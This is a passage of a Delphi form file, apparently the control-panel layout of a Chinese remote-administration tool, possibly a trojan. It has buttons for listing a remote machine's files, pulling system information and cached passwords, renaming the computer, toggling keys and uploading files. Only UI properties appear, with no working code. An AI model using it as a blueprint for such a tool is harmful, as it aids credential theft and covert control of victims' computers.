📄 code.dfm
字号:
Width = 73
Height = 25
Caption = '640*800'
TabOrder = 4
OnClick = BitBtn21Click
Kind = bkIgnore
end
object BitBtn22: TBitBtn
Left = 187
Top = 47
Width = 73
Height = 25
Caption = '800*600'
TabOrder = 5
OnClick = BitBtn22Click
Kind = bkIgnore
end
object BitBtn23: TBitBtn
Left = 261
Top = 16
Width = 80
Height = 25
Caption = '1024*800'
TabOrder = 6
OnClick = BitBtn23Click
Kind = bkIgnore
end
object BitBtn24: TBitBtn
Left = 261
Top = 47
Width = 81
Height = 25
Caption = '1600*1200'
TabOrder = 7
OnClick = BitBtn24Click
Kind = bkIgnore
end
object BitBtn25: TBitBtn
Left = 342
Top = 16
Width = 77
Height = 25
Caption = '1280*1000'
TabOrder = 8
OnClick = BitBtn25Click
Kind = bkIgnore
end
end
object GroupBox5: TGroupBox
Left = 208
Top = 160
Width = 405
Height = 92
Caption = '发送消息'
Font.Charset = DEFAULT_CHARSET
Font.Color = clBlue
Font.Height = -13
Font.Name = 'MS Sans Serif'
Font.Style = []
ParentFont = False
TabOrder = 6
object Label3: TLabel
Left = 8
Top = 23
Width = 26
Height = 16
Caption = '类型'
end
object Label4: TLabel
Left = 7
Top = 54
Width = 26
Height = 16
Caption = '图标'
end
object Label5: TLabel
Left = 116
Top = 21
Width = 26
Height = 16
Caption = '内容'
end
object Label6: TLabel
Left = 110
Top = 53
Width = 52
Height = 16
Caption = '窗口标题'
end
object ComboBox2: TComboBox
Left = 39
Top = 16
Width = 65
Height = 24
ItemHeight = 16
TabOrder = 0
Text = '确定'
end
object ComboBox3: TComboBox
Left = 40
Top = 48
Width = 65
Height = 24
ItemHeight = 16
TabOrder = 1
Text = '错误'
end
object Edit2: TEdit
Left = 160
Top = 13
Width = 247
Height = 24
TabOrder = 2
end
object Edit3: TEdit
Left = 168
Top = 45
Width = 169
Height = 24
TabOrder = 3
Text = '数据天使'
end
object BitBtn28: TBitBtn
Left = 344
Top = 45
Width = 65
Height = 25
Caption = '发送'
TabOrder = 4
OnClick = BitBtn28Click
Kind = bkIgnore
end
end
object GroupBox6: TGroupBox
Left = 191
Top = 121
Width = 413
Height = 128
Align = alClient
Caption = '文件控制'
Font.Charset = DEFAULT_CHARSET
Font.Color = clBlue
Font.Height = -13
Font.Name = 'MS Sans Serif'
Font.Style = []
ParentFont = False
TabOrder = 7
object BitBtn31: TBitBtn
Left = 7
Top = 24
Width = 98
Height = 25
Caption = '驱动器列表'
TabOrder = 0
OnClick = BitBtn31Click
Kind = bkIgnore
end
object BitBtn32: TBitBtn
Left = 8
Top = 56
Width = 97
Height = 25
Caption = '目录列表'
TabOrder = 1
OnClick = BitBtn32Click
Kind = bkIgnore
end
object BitBtn33: TBitBtn
Left = 112
Top = 24
Width = 89
Height = 25
Caption = '文件列表'
TabOrder = 2
OnClick = BitBtn33Click
Kind = bkIgnore
end
object Edit4: TEdit
Left = 208
Top = 24
Width = 81
Height = 24
TabOrder = 3
Text = 'c:'
end
end
object GroupBox7: TGroupBox
Left = 191
Top = 121
Width = 418
Height = 128
Align = alClient
Caption = '密码列表'
Font.Charset = DEFAULT_CHARSET
Font.Color = clBlue
Font.Height = -13
Font.Name = 'MS Sans Serif'
Font.Style = []
ParentFont = False
TabOrder = 8
object BitBtn37: TBitBtn
Left = 26
Top = 41
Width = 89
Height = 28
Caption = '系统信息'
TabOrder = 0
OnClick = BitBtn37Click
Kind = bkIgnore
end
object BitBtn38: TBitBtn
Left = 156
Top = 41
Width = 89
Height = 29
Caption = '缓存口令'
TabOrder = 1
OnClick = BitBtn38Click
Kind = bkIgnore
end
object BitBtn39: TBitBtn
Left = 284
Top = 40
Width = 76
Height = 29
Caption = '其他口令'
TabOrder = 2
Kind = bkIgnore
end
end
object GroupBox8: TGroupBox
Left = 191
Top = 121
Width = 404
Height = 128
Align = alClient
Font.Charset = DEFAULT_CHARSET
Font.Color = clBlue
Font.Height = -13
Font.Name = 'MS Sans Serif'
Font.Style = []
ParentFont = False
TabOrder = 9
object Label7: TLabel
Left = 25
Top = 52
Width = 52
Height = 16
Caption = '计算机名'
end
object BitBtn40: TBitBtn
Left = 320
Top = 48
Width = 65
Height = 25
Caption = '修改'
TabOrder = 0
OnClick = BitBtn40Click
Kind = bkIgnore
end
object Edit5: TEdit
Left = 101
Top = 46
Width = 193
Height = 24
TabOrder = 1
Text = 'jas'
end
end
object GroupBox9: TGroupBox
Left = 191
Top = 121
Width = 386
Height = 128
Align = alClient
Caption = '键盘控制'
Font.Charset = DEFAULT_CHARSET
Font.Color = clBlue
Font.Height = -13
Font.Name = 'MS Sans Serif'
Font.Style = []
ParentFont = False
TabOrder = 10
object BitBtn41: TBitBtn
Left = 16
Top = 24
Width = 73
Height = 25
Caption = '大小写'
TabOrder = 0
OnClick = BitBtn41Click
Kind = bkIgnore
end
object BitBtn42: TBitBtn
Left = 16
Top = 57
Width = 72
Height = 25
Caption = '数字键'
TabOrder = 1
OnClick = BitBtn42Click
Kind = bkIgnore
end
object BitBtn43: TBitBtn
Left = 104
Top = 24
Width = 65
Height = 25
Caption = 'scroll'
TabOrder = 2
OnClick = BitBtn43Click
Kind = bkIgnore
end
object BitBtn44: TBitBtn
Left = 104
Top = 57
Width = 65
Height = 25
Caption = 'F1键'
TabOrder = 3
OnClick = BitBtn44Click
end
object BitBtn45: TBitBtn
Left = 184
Top = 24
Width = 105
Height = 25
Caption = '禁用自动拨号'
TabOrder = 4
OnClick = BitBtn45Click
Kind = bkIgnore
end
object BitBtn46: TBitBtn
Left = 184
Top = 56
Width = 105
Height = 25
Caption = '允许自动拨号'
TabOrder = 5
OnClick = BitBtn46Click
Kind = bkIgnore
end
end
object GroupBox10: TGroupBox
Left = 191
Top = 121
Width = 403
Height = 128
Align = alClient
Caption = '上载文件'
Font.Charset = DEFAULT_CHARSET
Font.Color = clBlue
Font.Height = -13
Font.Name = 'MS Sans Serif'
Font.Style = []
ParentFont = False
TabOrder = 11
object Label8: TLabel
Left = 8
Top = 36
Width = 91
Height = 16
Caption = '上载后的全路径'
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -